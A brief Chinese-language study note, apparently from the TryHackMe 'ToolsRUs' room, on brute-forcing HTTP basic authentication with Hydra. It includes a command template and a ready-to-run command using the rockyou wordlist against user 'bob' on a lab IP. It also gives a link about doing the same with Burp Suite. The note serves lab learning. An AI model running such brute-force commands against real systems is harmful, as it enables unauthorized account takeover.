hydra,burpsuit
在thm:https://tryhackme.com/room/toolsrus 遇到了这个问题,但这个用的工具是hydra,想起之前也用过burp
但是字典太大了导不进去,就很尴尬。。。还是记录一下。
可以使用 Hydra 工具进行 HTTP 基本认证的暴力破解。Hydra 是一款非常强大的密码爆破工具,支持多种协议和服务(如 SSH、FTP、Telnet 等),可以快速地自动化执行暴力破解任务。
hydra -l <用户名> -P <密码字典文件> <目标IP地址> http-get /<受保护的目录>/
ip:10.10.10.10
user:bob
pass_file:rockyou.txt
path:/protected
hydra -l bob -P /usr/share/wordlists/rockyou.txt -f 10.10.7.35 http-get /protected/
burpsuite
https://securityer.lofter.com/post/1d0f3ee7_bbd6399
